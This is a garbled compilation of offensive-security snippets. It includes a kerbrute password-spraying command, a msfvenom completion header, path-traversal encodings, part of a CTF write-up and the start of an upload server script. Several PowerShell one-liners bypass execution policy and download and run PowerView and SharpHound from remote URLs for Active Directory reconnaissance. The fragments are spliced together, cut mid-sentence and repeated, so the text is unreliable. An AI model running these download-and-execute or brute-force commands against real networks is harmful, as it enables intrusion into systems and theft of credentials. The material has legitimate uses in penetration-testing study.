With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
https://github.com/github/training-kit | |
https://github.com/AdguardTeam/AdGuardHome | |
https://github.com/TH3xACE/SUDO_KILLER | |
https://github.com/simbody/simbody | |
https://github.com/matthieu-hackwitharts/Win32_Offensive_Cheatsheet |
#compdef msfvenom | |
#autoload | |
# | |
# zsh completion for msfvenom in Metasploit Framework Project (https://www.metasploit.com) | |
# | |
# license: GNU General Public License v3.0 | |
# | |
# Copyright (c) 2018, Green-m | |
# All rights reserved. | |
# |
Wordlist == /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt | |
Traversal encoding: | |
=================== | |
../ | |
..\ | |
..\/ | |
%2e%2e%2f | |
%252e%252e%252f | |
%c0%ae%c0%ae%c0%af |
# Domain Recon | |
## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
## Import PowerView Module | |
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" | |
## Invoke-BloodHound for domain recon | |
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
During the C-Days18 conference André (@0xACB) and Zé (@JLLiS) CTF junkies teased me to participate in H1CTF18. At first, I wasn't entirely convinced since it had already been running for a few days. Nevertheless, I decided to have a crack at it.
The web challenge starts with a simple visit to an endpoint on http://159.203.178.9/ that is running a webpage with the following title "Notes RPC Capture The Flag" and in the body " ...somewhere on this server, a service can be found that allows a user to securely stores notes. In one of the notes, a flag is hidden."
Without a shadow of a doubt; I must find a way to interact with that note service.
As always recon is the first thing to do. I started with the browser. After opening the page, I turned to the network tab on the Developer Tools and went through to the response headers, where I got "Apache/2.4.18 (Ubuntu)".
My first attempt was looking for "/server-status/" since the ([status
. | |
.. | |
........ | |
@ | |
* | |
*.* | |
*.*.* | |
🎠|
#!/usr/bin/env python3 | |
"""Simple HTTP Server With Upload. | |
This module builds on BaseHTTPServer by implementing the standard GET | |
and HEAD requests in a fairly straightforward manner. | |
see: https://gist.github.com/UniIsland/3346170 | |
""" | |
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ | |
# generate server.xml with the following command: | |
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
# run as follows: | |
# python simple-https-server.py | |
# then in your browser, visit: | |
# https://localhost:4443 | |
import BaseHTTPServer, SimpleHTTPServer | |
import ssl |